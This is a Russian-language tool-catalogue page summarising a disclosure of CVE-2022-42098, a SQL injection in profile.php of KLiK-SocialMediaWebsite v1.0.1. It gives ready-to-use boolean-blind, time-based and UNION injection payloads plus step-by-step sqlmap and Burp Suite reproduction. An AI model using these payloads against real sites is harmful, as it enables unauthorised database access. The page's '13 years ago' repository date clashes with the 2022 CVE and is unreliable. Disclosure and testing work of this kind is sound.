Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-42098 — KLiK-SocialMediaWebsite v1.0.1 содержит уязвимости SQL-инъекций в profile.php. | Kitploit
Инструменты/GitHubGitHub/bypazs/cve-2022-42098
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubbypazs/cve-2022-42098

CVE-2022-42098

KLiK-SocialMediaWebsite v1.0.1 содержит уязвимости SQL-инъекций в profile.php.

Репозиторий
13 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

KLiK-SocialMediaWebsite версия v1.0.1

Описание уязвимости:

KLiK-SocialMediaWebsite v1.0.1 содержит уязвимости SQL-инъекций в profile.php в параметре id.

Векторы атаки:

KLiK-SocialMediaWebsite v1.0.1 После создания пользователя также можно находить людей на KLiK через страницу KLiK Users. Параметр "id" в profile.php может быть использован для внедрения произвольных SQL-запросов.

Затронуто:

  • http://ip_address/KLiK/profile.php?id=user_id
  • GET /KLiK/login.php

Полезная нагрузка:

root@kitploit:~
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=27 AND 3227=3227

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=27 AND (SELECT 3046 FROM (SELECT(SLEEP(5)))barN)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: id=-2373 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71787a7171,0x6d67676474624545784f564265735871415865575a4f72697053686d724768624969514c70754459,0x717a707071),NULL,NULL,NULL,NULL,NULL,NULL#

Протестировано на:

  1. KLiK SocialMediaWebsite version v1.0.1 (https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1)
  2. Firefox версия 105
  3. sqlmap версия 1.6.7 stable

Шаги для атаки:

  1. Выполните вход с именем пользователя и паролем.
  2. Нажмите на значок, изображающий человека, в правом верхнем углу.
  3. Перехватите запрос с помощью Burp Suite.
  4. Выберите пользователя на странице KLiK Users, нажав на его имя.
  5. Вернувшись в Burp Suite, на /profile.php, щелкните правой кнопкой мыши и выберите "Копировать в файл".
  6. Отправьте файл запроса в Kali Linux и используйте с ним sqlmap.
  7. Уязвимость SQL-инъекции обнаружена через id

Обнаружитель:

:shipit: Grim The Ripper Team от SOSECURE Thailand

Medium:

График раскрытия:

  • 2022–09–28: Уязвимость обнаружена.
  • 2022–09–28: Уязвимость сообщена корпорации MITRE.
  • 2022–10–15: CVE зарезервирован.
  • 2022–10–31: Публичное раскрытие уязвимости.

Ссылки:

  1. https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1

  2. https://github.com/msaad1999/KLiK-SocialMediaWebsite

Скачать инструмент